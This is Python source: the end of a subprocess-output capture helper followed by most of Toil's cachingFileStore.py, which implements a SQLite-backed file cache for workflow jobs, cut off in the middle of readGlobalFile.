except UnicodeDecodeError:
logger.error(
'Failed to decode subprocess output', with_exc=True,
)
continue
decoded = decoded.rstrip('\r\n')
with lock_process_completion:
if process_completed:
# Treat postmortem output from pipe as error.
# For example pg_ctl does not close pipe on exit so we may
# get output later from a started process.
logger.warning('[%s] %s', command_alias, decoded)
else:
if verbose > 1:
logger.info('[%s] %s', command_alias, decoded)
else:
buffer.append(decoded)
process = subprocess.Popen(
args, env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
)
thread = threading.Thread(target=_capture_output)
thread.daemon = True
thread.start()
exit_code = process.wait()
with lock_process_completion:
process_completed = True
if exit_code != 0:
for msg in buffer:
logger.error('[%s] %s', command_alias, msg)
logger.error(
'[%s] subprocess %s exited with code %d',
command_alias,
process.args,
exit_code,
)
if exit_code != 0:
raise SubprocessFailed(
f'{command_alias} subprocess {process.args!r} '
f'exited with code {exit_code}',
)
|
cachingFileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from contextlib import contextmanager
import errno
import hashlib
import logging
import os
import re
import shutil
import sqlite3
import sys
import tempfile
import threading
import time
import uuid
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.lib.humanize import bytes2human
from toil.lib.misc import mkdir_p, robust_rmtree, atomic_copy, atomic_copyobj
from toil.lib.retry import retry
from toil.lib.threading import get_process_name, process_name_exists
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
# Define a usable FileNotFoundError as will be raised by os.remove on a
# nonexistent file.
FileNotFoundError = OSError
# Use longer timeout to avoid hitting 'database is locked' errors.
SQLITE_TIMEOUT_SECS = 60.0
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error raised if the caching code discovers a file that represents a
reference to a cached file to have gone missing.
This can be a big problem if a hard link is moved, because then the cache
will be unable to evict the file it links to.
Remember that files read with readGlobalFile may not be deleted by the user
and need to be deleted with deleteLocalFile.
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) has been deleted or moved by user ' \
' without updating cache database. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
class CachingFileStore(AbstractFileStore):
"""
A cache-enabled file store.
Provides files that are read out as symlinks or hard links into a cache
directory for the node, if permitted by the workflow.
Also attempts to write files back to the backing JobStore asynchronously,
after quickly taking them into the cache. Writes are only required to
finish when the job's actual state after running is committed back to the
job store.
Internaly, manages caching using a database. Each node has its own
database, shared between all the workers on the node. The database contains
several tables:
files contains one entry for each file in the cache. Each entry knows the
path to its data on disk. It also knows its global file ID, its state, and
its owning worker PID. If the owning worker dies, another worker will pick
it up. It also knows its size.
File states are:
- "cached": happily stored in the cache. Reads can happen immediately.
Owner is null. May be adopted and moved to state "deleting" by anyone, if
it has no outstanding immutable references.
- "downloading": in the process of being saved to the cache by a non-null
owner. Reads must wait for the state to become "cached". If the worker
dies, goes to state "deleting", because we don't know if it was fully
downloaded or if anyone still needs it. No references can be created to a
"downloading" file except by the worker responsible for downloading it.
- "uploadable": stored in the cache and ready to be written to the job
store by a non-null owner. Transitions to "uploading" when a (thread of)
the owning worker process picks it up and begins uploading it, to free
cache space or to commit a completed job. If the worker dies, goes to
state "cached", because it may have outstanding immutable references from
the dead-but-not-cleaned-up job that was going to write it.
- "uploading": stored in the cache and being written to the job store by a
non-null owner. Transitions to "cached" when successfully uploaded. If
the worker dies, goes to state "cached", because it may have outstanding
immutable references from the dead-but-not-cleaned-up job that was
writing it.
- "deleting": in the process of being removed from the cache by a non-null
owner. Will eventually be removed from the database.
refs contains one entry for each outstanding reference to a cached file
(hard link, symlink, or full copy). The table name is refs instead of
references because references is an SQL reserved word. It remembers what
job ID has the reference, and the path the reference is at. References have
three states:
- "immutable": represents a hardlink or symlink to a file in the cache.
Dedicates the file's size in bytes of the job's disk requirement to the
cache, to be used to cache this file or to keep around other files
without references. May be upgraded to "copying" if the link can't
actually be created.
- "copying": records that a file in the cache is in the process of being
copied to a path. Will be upgraded to a mutable reference eventually.
- "mutable": records that a file from the cache was copied to a certain
path. Exist only to support deleteLocalFile's API. Only files with only
mutable references (or no references) are eligible for eviction.
jobs contains one entry for each job currently running. It keeps track of
the job's ID, the worker that is supposed to be running the job, the job's
disk requirement, and the job's local temp dir path that will need to be
cleaned up. When workers check for jobs whose workers have died, they null
out the old worker, and grab ownership of and clean up jobs and their
references until the null-worker jobs are gone.
properties contains key, value pairs for tracking total space available,
and whether caching is free for this run.
"""
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# For testing, we have the ability to force caching to be non-free, by never linking from the file store
self.forceNonFreeCaching = False
# Also for testing, we have the ability to force a delay (in seconds)
# during file download from the job store, in order to easily test the
# behavior of the system when a download is in progress.
self.forceDownloadDelay = None
# When waiting for other running workers to download a file, or
# otherwise progress, how long in seconds should we wait between
# polling attempts? Our mechanism for polling involves an exclusive
# lock on the database and conditional writes, so this should be high
# enough that everyone isn't constantly contending for the lock.
self.contentionBackoff = 15
# Variables related to caching
# Decide where the cache directory will be. We put it next to the
# local temp dirs for all of the jobs run on this machine.
# At this point in worker startup, when we are setting up caching,
# localTempDir is the worker directory, not the job directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
# Since each worker has it's own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track some stuff about the running job in ourselves.
self.jobName = str(self.jobGraph)
self.jobID = self.jobGraph.jobStoreID
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# When the job actually starts, we will fill this in with the job's disk requirement.
self.jobDiskBytes = None
# We need to track what attempt of the workflow we are, to prevent crosstalk between attempts' caches.
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# Make sure the cache directory exists
mkdir_p(self.localCacheDir)
# Connect to the cache database in there, or create it if not present.
# We name it by workflow attempt number in case a previous attempt of
# the workflow left one behind without cleaning up properly; we need to
# be able to tell that from showing up on a machine where a cache has
# already been created.
self.dbPath = os.path.join(self.localCacheDir, 'cache-{}.db'.format(self.workflowAttemptNumber))
# We need to hold onto both a connection (to commit) and a cursor (to actually use the database)
self.con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
self.cur = self.con.cursor()
# Note that sqlite3 automatically starts a transaction when we go to
# modify the database.
# To finish this transaction and let other people read our writes (or
# write themselves), we need to COMMIT after every coherent set of
# writes.
# Set up the tables
self._ensureTables(self.con)
# Initialize the space accounting properties
freeSpace, _ = getFileSystemSize(self.localCacheDir)
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('maxSpace', freeSpace))])
# Space used by caching and by jobs is accounted with queries
# We maintain an asynchronous upload thread, which gets kicked off when
# we commit the job's completion. It will be None until then. When it
# is running, it has exclusive control over our database connection,
# because the job we exist for will have already completed. However, it
# has to coordinate its activities with other CachingFileStore objects
# in the same process (and thus sharing the same PID) and ensure that
# only one of them is working on uploading any given file at any given
# time.
self.commitThread = None
@staticmethod
def _staticWrite(con, cur, operations):
"""
Write to the caching database, using the given connection.
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
for attempt in retry(timeout=float('inf'), predicate=lambda e: isinstance(e, sqlite3.OperationalError) and 'is locked' in str(e)):
# Try forever with backoff
with attempt:
try:
for item in operations:
if not isinstance(item, tuple):
# Must be a single SQL string. Wrap it.
item = (item,)
# Parse out the command and the variables to substitute
command = item[0]
if len(item) < 2:
args = ()
else:
args = item[1]
# Do it
cur.execute(command, args)
except Exception as e:
logging.error('Error talking to caching database: %s', str(e))
# Try to make sure we don't somehow leave anything part-done if a
# middle operation somehow fails.
try:
con.rollback()
except:
# But don't stop if we can't roll back.
pass
# Raise and maybe retry
raise e
else:
# The transaction worked!
# Now commit the transaction.
con.commit()
return cur.rowcount
def _write(self, operations):
"""
Write to the caching database, using the instance's connection
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
return self._staticWrite(self.con, self.cur, operations)
@classmethod
def _ensureTables(cls, con):
"""
Ensure that the database tables we expect exist.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
cls._staticWrite(con, cur, ["""
CREATE TABLE IF NOT EXISTS files (
id TEXT NOT NULL PRIMARY KEY,
path TEXT UNIQUE NOT NULL,
size INT NOT NULL,
state TEXT NOT NULL,
owner TEXT
)
""", """
CREATE TABLE IF NOT EXISTS refs (
path TEXT NOT NULL,
file_id TEXT NOT NULL,
job_id TEXT NOT NULL,
state TEXT NOT NULL,
PRIMARY KEY (path, file_id)
)
""", """
CREATE TABLE IF NOT EXISTS jobs (
id TEXT NOT NULL PRIMARY KEY,
tempdir TEXT NOT NULL,
disk INT NOT NULL,
worker TEXT
)
""", """
CREATE TABLE IF NOT EXISTS properties (
name TEXT NOT NULL PRIMARY KEY,
value INT NOT NULL
)
"""])
# Caching-specific API
def getCacheLimit(self):
"""
Return the total number of bytes to which the cache is limited.
If no limit is available, raises an error.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('maxSpace',)):
return row[0]
raise RuntimeError('Unable to retrieve cache limit')
def getCacheUsed(self):
"""
Return the total number of bytes used in the cache.
If no value is available, raises an error.
"""
# Space never counts as used if caching is free
if self.cachingIsFree():
return 0
for row in self.cur.execute('SELECT TOTAL(size) FROM files'):
return row[0]
raise RuntimeError('Unable to retrieve cache usage')
def getCacheExtraJobSpace(self):
"""
Return the total number of bytes of disk space requested by jobs
running against this cache but not yet used.
We can get into a situation where the jobs on the node take up all its
space, but then they want to write to or read from the cache. So when
that happens, we need to debit space from them somehow...
If no value is available, raises an error.
"""
# Total up the sizes of all the reads of files and subtract it from the total disk reservation of all jobs
for row in self.cur.execute("""
SELECT (
(SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state == 'immutable')
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve extra job space')
def getCacheAvailable(self):
"""
Return the total number of free bytes available for caching, or, if
negative, the total number of bytes of cached files that need to be
evicted to free up enough space for all the currently scheduled jobs.
If no value is available, raises an error.
"""
# Get the max space on our disk.
# Subtract out the number of bytes of cached content.
# Also subtract out the number of bytes of job disk requirements that
# aren't being spent by those jobs on immutable references to cached
# content.
# Do a little report first
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
logger.debug('Max space: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(size) FROM files"):
logger.debug('Total file size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(disk) FROM jobs"):
logger.debug('Total job disk requirement size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'"):
logger.debug('Total immutable reference size: %d', row[0])
if self.cachingIsFree():
# If caching is free, we just say that all the space is always available.
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(size) FROM files) -
((SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'))
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
def getSpaceUsableForJobs(self):
"""
Return the total number of bytes that are not taken up by job requirements, ignoring files and file usage.
We can't ever run more jobs than we actually have room for, even with caching.
If not retrievable, raises an error.
"""
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(disk) FROM jobs)
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve usabel space for jobs')
def getCacheUnusedJobRequirement(self):
"""
Return the total number of bytes of disk space requested by the current
job and not used by files the job is using in the cache.
Mutable references don't count, but immutable/uploading ones do.
If no value is available, raises an error.
"""
logger.debug('Get unused space for job %s', self.jobID)
for row in self.cur.execute('SELECT * FROM files'):
logger.debug('File record: %s', str(row))
for row in self.cur.execute('SELECT * FROM refs'):
logger.debug('Ref record: %s', str(row))
for row in self.cur.execute('SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.job_id = ? AND refs.state != ?',
(self.jobID, 'mutable')):
# Sum up all the sizes of our referenced files, then subtract that from how much we came in with
return self.jobDiskBytes - row[0]
raise RuntimeError('Unable to retrieve unused job requirement space')
def adjustCacheLimit(self, newTotalBytes):
"""
Adjust the total cache size limit to the given number of bytes.
"""
self._write([('UPDATE properties SET value = ? WHERE name = ?', (newTotalBytes, 'maxSpace'))])
def fileIsCached(self, fileID):
"""
Return true if the given file is currently cached, and false otherwise.
Note that this can't really be relied upon because a file may go cached
-> deleting after you look at it. If you need to do something with the
file you need to do it in a transaction.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(fileID, 'cached', 'uploadable', 'uploading')):
return row[0] > 0
return False
def getFileReaderCount(self, fileID):
"""
Return the number of current outstanding reads of the given file.
Counts mutable references too.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE file_id = ?', (fileID,)):
return row[0]
return 0
def cachingIsFree(self):
"""
Return true if files can be cached for free, without taking up space.
Return false otherwise.
This will be true when working with certain job stores in certain
configurations, most notably the FileJobStore.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('freeCaching',)):
return row[0] == 1
# Otherwise we need to set it
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore) and not self.forceNonFreeCaching:
# Caching may be free since we are using a file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out to a generated name.
destDir = tempfile.mkdtemp(dir=self.localCacheDir)
cachedFile = os.path.join(destDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
if os.stat(cachedFile).st_nlink == 2:
# Caching must be free
free = 1
else:
# If we only have one link, caching costs disk.
free = 0
# Clean up
os.unlink(cachedFile)
os.rmdir(destDir)
self.jobStore.deleteFile(emptyID)
else:
# Caching is only ever free with the file job store
free = 0
# Save to the database if we're the first to work this out
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('freeCaching', free))])
# Return true if we said caching was free
return free == 1
# Internal caching logic
def _getNewCachingPath(self, fileStoreID):
"""
Get a path at which the given file ID can be cached.
Will be unique for every call.
The file will not be created if it does not exist.
"""
# Hash the file ID
hasher = hashlib.sha1()
hasher.update(fileStoreID.encode('utf-8'))
# Get a unique temp file name, including the file ID's hash to make
# sure we can never collide even though we are going to remove the
# file.
# TODO: use a de-slashed version of the ID instead?
handle, path = tempfile.mkstemp(dir=self.localCacheDir, suffix=hasher.hexdigest())
os.close(handle)
os.unlink(path)
return path
def _stealWorkFromTheDead(self):
"""
Take ownership of any files we can see whose owners have died.
We don't actually process them here. We take action based on the states of files we own later.
"""
me = get_process_name(self.workDir)
# Get a list of all file owner processes on this node.
# Exclude NULL because it comes out as 0 and we can't look for PID 0.
owners = []
for row in self.cur.execute('SELECT DISTINCT owner FROM files WHERE owner IS NOT NULL'):
owners.append(row[0])
# Work out which of them have died.
deadOwners = []
for owner in owners:
if not process_name_exists(self.workDir, owner):
deadOwners.append(owner)
for owner in deadOwners:
# Try and adopt all the files that any dead owner had
# If they were deleting, we delete.
# If they were downloading, we delete. Any outstanding references
# can't be in use since they are from the dead downloader.
# If they were uploading or uploadable, we mark as cached even
# though it never made it to the job store (and leave it unowned).
#
# Once the dead job that it was being uploaded from is cleaned up,
# and there are no longer any immutable references, it will be
# evicted as normal. Since the dead job can't have been marked
# successfully completed (since the file is still not uploaded),
# nobody is allowed to actually try and use the file.
#
# TODO: if we ever let other PIDs be responsible for writing our
# files asynchronously, this will need to change.
self._write([('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'deleting')),
('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'downloading')),
('UPDATE files SET owner = NULL, state = ? WHERE owner = ? AND (state = ? OR state = ?)',
('cached', owner, 'uploadable', 'uploading'))])
logger.debug('Tried to adopt file operations from dead worker %d', owner)
@classmethod
def _executePendingDeletions(cls, workDir, con, cur):
"""
Delete all the files that are registered in the database as in the
process of being deleted from the cache by us.
Returns the number of files that were deleted.
Implemented as a class method so it can use the database connection
appropriate to its thread without any chance of getting at the main
thread's connection and cursor in self.
:param str workDir: The Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
me = get_process_name(workDir)
# Remember the file IDs we are deleting
deletedFiles = []
for row in cur.execute('SELECT id, path FROM files WHERE owner = ? AND state = ?', (me, 'deleting')):
# Grab everything we are supposed to delete and delete it
fileID = row[0]
filePath = row[1]
try:
os.unlink(filePath)
except OSError:
# Probably already deleted
continue
# Whether we deleted the file or just found out that it is gone, we
# need to take credit for deleting it so that we remove it from the
# database.
deletedFiles.append(fileID)
for fileID in deletedFiles:
# Drop all the files. They should have stayed in deleting state. We move them from there to not present at all.
# Also drop their references, if they had any from dead downloaders.
cls._staticWrite(con, cur, [('DELETE FROM files WHERE id = ? AND state = ?', (fileID, 'deleting')),
('DELETE FROM refs WHERE file_id = ?', (fileID,))])
return len(deletedFiles)
def _executePendingUploads(self, con, cur):
"""
Uploads all files in uploadable state that we own.
Returns the number of files that were uploaded.
Needs access to self to get at the job store for uploading files, but
still needs to take con and cur so it can run in a thread with the
thread's database connection.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
# Work out who we are
me = get_process_name(self.workDir)
# Record how many files we upload
uploadedCount = 0
while True:
# Try and find a file we might want to upload
fileID = None
filePath = None
for row in cur.execute('SELECT id, path FROM files WHERE state = ? AND owner = ? LIMIT 1', ('uploadable', me)):
fileID = row[0]
filePath = row[1]
if fileID is None:
# Nothing else exists to upload
break
# We need to set it to uploading in a way that we can detect that *we* won the update race instead of anyone else.
rowCount = self._staticWrite(con, cur, [('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploading', fileID, 'uploadable'))])
if rowCount != 1:
# We didn't manage to update it. Someone else (a running job if
# we are a committing thread, or visa versa) must have grabbed
# it.
logger.debug('Lost race to upload %s', fileID)
# Try again to see if there is something else to grab.
continue
# Upload the file
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, filePath)
# Count it for the total uploaded files value we need to return
uploadedCount += 1
# Remember that we uploaded it in the database
self._staticWrite(con, cur, [('UPDATE files SET state = ?, owner = NULL WHERE id = ?', ('cached', fileID))])
return uploadedCount
def _allocateSpaceForJob(self, newJobReqs):
"""
A new job is starting that needs newJobReqs space.
We need to record that we have a job running now that needs this much space.
We also need to evict enough stuff from the cache so that we have room
for this job to fill up that much space even if it doesn't cache
anything.
localTempDir must have already been pointed to the job's temp dir.
:param float newJobReqs: the total number of bytes that this job requires.
"""
# Put an entry in the database for this job being run on this worker.
# This will take up space for us and potentially make the cache over-full.
# But we won't actually let the job run and use any of this space until
# the cache has been successfully cleared out.
me = get_process_name(self.workDir)
self._write([('INSERT INTO jobs VALUES (?, ?, ?, ?)', (self.jobID, self.localTempDir, newJobReqs, me))])
# Now we need to make sure that we can fit all currently cached files,
# and the parts of the total job requirements not currently spent on
# cached files, in under the total disk space limit.
available = self.getCacheAvailable()
logger.debug('Available space with job: %d bytes', available)
if available >= 0:
# We're fine on disk space
return
# Otherwise we need to clear stuff.
self._freeUpSpace()
@classmethod
def _removeJob(cls, con, cur, jobID):
"""
Get rid of the job with the given ID.
The job must be owned by us.
Deletes the job's database entry, all its references, and its whole
temporary directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param str jobID: Hash-based ID of the job being removed. Not a Toil JobStore ID.
"""
# Get the job's temp dir
for row in cur.execute('SELECT tempdir FROM jobs WHERE id = ?', (jobID,)):
jobTemp = row[0]
for row in cur.execute('SELECT path FROM refs WHERE job_id = ?', (jobID,)):
try:
# Delete all the reference files.
os.unlink(row[0])
except OSError:
# May not exist
pass
# And their database entries
cls._staticWrite(con, cur, [('DELETE FROM refs WHERE job_id = ?', (jobID,))])
try:
# Delete the job's temp directory to the extent that we can.
shutil.rmtree(jobTemp)
except OSError:
pass
# Strike the job from the database
cls._staticWrite(con, cur, [('DELETE FROM jobs WHERE id = ?', (jobID,))])
def _deallocateSpaceForJob(self):
"""
Our current job that was using oldJobReqs space has finished.
We need to record that the job is no longer running, so its space not
taken up by files in the cache will be free.
"""
self._removeJob(self.con, self.cur, self.jobID)
def _tryToFreeUpSpace(self):
"""
If disk space is overcommitted, try one round of collecting files to upload/download/delete/evict.
Return whether we manage to get any space freed or not.
"""
# First we want to make sure that dead jobs aren't holding
# references to files and keeping them from looking unused.
self._removeDeadJobs(self.workDir, self.con)
# Adopt work from any dead workers
self._stealWorkFromTheDead()
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We actually had something to delete, which we deleted.
# Maybe there is space now
logger.debug('Successfully executed pending deletions to free space')
return True
if self._executePendingUploads(self.con, self.cur) > 0:
# We had something to upload. Maybe it can be evicted now.
logger.debug('Successfully executed pending uploads to free space')
return True
# Otherwise, not enough files could be found in deleting state to solve our problem.
# We need to put something into the deleting state.
# TODO: give other people time to finish their in-progress
# evictions before starting more, or we might evict everything as
# soon as we hit the cache limit.
# Find something that has no non-mutable references and is not already being deleted.
self.cur.execute("""
SELECT files.id FROM files WHERE files.state = 'cached' AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
) LIMIT 1
""")
row = self.cur.fetchone()
if row is None:
# Nothing can be evicted by us.
# Someone else might be in the process of evicting something that will free up space for us too.
# Or someone mught be uploading something and we have to wait for them to finish before it can be deleted.
logger.debug('Could not find anything to evict! Cannot free up space!')
return False
# Otherwise we found an eviction candidate.
fileID = row[0]
# Work out who we are
me = get_process_name(self.workDir)
# Try and grab it for deletion, subject to the condition that nothing has started reading it
self._write([("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'deleting', fileID, 'cached'))])
logger.debug('Evicting file %s', fileID)
# Whether we actually got it or not, try deleting everything we have to delete
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We deleted something
logger.debug('Successfully executed pending deletions to free space')
return True
def _freeUpSpace(self):
"""
If disk space is overcomitted, block and evict eligible things from the
cache until it is no longer overcommitted.
"""
availableSpace = self.getCacheAvailable()
# Track how long we are willing to wait for cache space to free up without making progress evicting things before we give up.
# This is the longes that we will wait for uploads and other deleters.
patience = 10
while availableSpace < 0:
# While there isn't enough space for the thing we want
logger.debug('Cache is full (%d bytes free). Trying to free up space!', availableSpace)
# Free up space. See if we made any progress
progress = self._tryToFreeUpSpace()
availableSpace = self.getCacheAvailable()
if progress:
# Reset our patience
patience = 10
else:
# See if we've been oversubscribed.
jobSpace = self.getSpaceUsableForJobs()
if jobSpace < 0:
logger.critical('Jobs on this machine have oversubscribed our total available space (%d bytes)!', jobSpace)
raise CacheUnbalancedError
else:
patience -= 1
if patience <= 0:
logger.critical('Waited implausibly long for active uploads and deletes.')
raise CacheUnbalancedError
else:
# Wait a bit and come back
time.sleep(2)
logger.debug('Cache has %d bytes free.', availableSpace)
# Normal AbstractFileStore API
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
# Move self.localTempDir from the worker directory set up in __init__ to a per-job directory.
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the database, clean them up ourselves.
self._removeDeadJobs(self.workDir, self.con)
# Get the requirements for the job.
self.jobDiskBytes = job.disk
logger.debug('Actually running job (%s) with ID (%s) which wants %d of our %d bytes.',
self.jobName, self.jobID, self.jobDiskBytes, self.getCacheLimit())
# Register the current job as taking this much space, and evict files
# from the cache to make room before letting the job run.
self._allocateSpaceForJob(self.jobDiskBytes)
try:
os.chdir(self.localTempDir)
yield
finally:
# See how much disk space is used at the end of the job.
# Not a real peak disk usage, but close enough to be useful for warning the user.
# TODO: Push this logic into the abstract file store
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / self.jobDiskBytes * 100 if
self.jobDiskBytes > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(self.jobDiskBytes),
requestedDisk=self.jobDiskBytes))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > self.jobDiskBytes:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
# Go back up to the per-worker local temp directory.
os.chdir(startingDir)
self.cleanupInProgress = True
# Record that our job is no longer using its space, and clean up
# its temp dir and database entry.
self._deallocateSpaceForJob()
def writeGlobalFile(self, localFileName, cleanup=False):
# Work out the file itself
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# And get its size
fileSize = os.stat(absLocalFileName).st_size
# Work out who is making the file
creatorID = self.jobGraph.jobStoreID
# Create an empty file to get an ID.
# TODO: this empty file could leak if we die now...
fileID = self.jobStore.getEmptyFileStoreID(creatorID, cleanup)
# Work out who we are
me = get_process_name(self.workDir)
# Work out where the file ought to go in the cache
cachePath = self._getNewCachingPath(fileID)
# Create a file in uploadable state and a reference, in the same transaction.
# Say the reference is an immutable reference
self._write([('INSERT INTO files VALUES (?, ?, ?, ?, ?)', (fileID, cachePath, fileSize, 'uploadable', me)),
('INSERT INTO refs VALUES (?, ?, ?, ?)', (absLocalFileName, fileID, creatorID, 'immutable'))])
if absLocalFileName.startswith(self.localTempDir):
# We should link into the cache, because the upload is coming from our local temp dir
try:
# Try and hardlink the file into the cache.
# This can only fail if the system doesn't have hardlinks, or the
# file we're trying to link to has too many hardlinks to it
# already, or something.
os.link(absLocalFileName, cachePath)
linkedToCache = True
logger.debug('Linked file %s into cache at %s; deferring write to job store', localFileName, cachePath)
# Don't do the upload now. Let it be deferred until later (when the job is committing).
except OSError:
# We couldn't make the link for some reason
linkedToCache = False
else:
# The tests insist that if you are uploading a file from outside
# the local temp dir, it should not be linked into the cache.
linkedToCache = False
if not linkedToCache:
# If we can't do the link into the cache and upload from there, we
# have to just upload right away. We can't guarantee sufficient
# space to make a full copy in the cache, if we aren't allowed to
# take this copy away from the writer.
# Change the reference to 'mutable', which it will be.
# And drop the file altogether.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', absLocalFileName, fileID)),
('DELETE FROM files WHERE id = ?', (fileID,))])
# Save the file to the job store right now
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, absLocalFileName)
# Ship out the completed FileID object with its real size.
return FileID.forPath(fileID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
if userPath is not None:
# Validate the destination we got
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
# Make our own destination
localFilePath = self.getLocalTempFileName()
# Work out what job we are operating on behalf of
readerID = self.jobGraph.jobStoreID
if cache:
# We want to use the cache
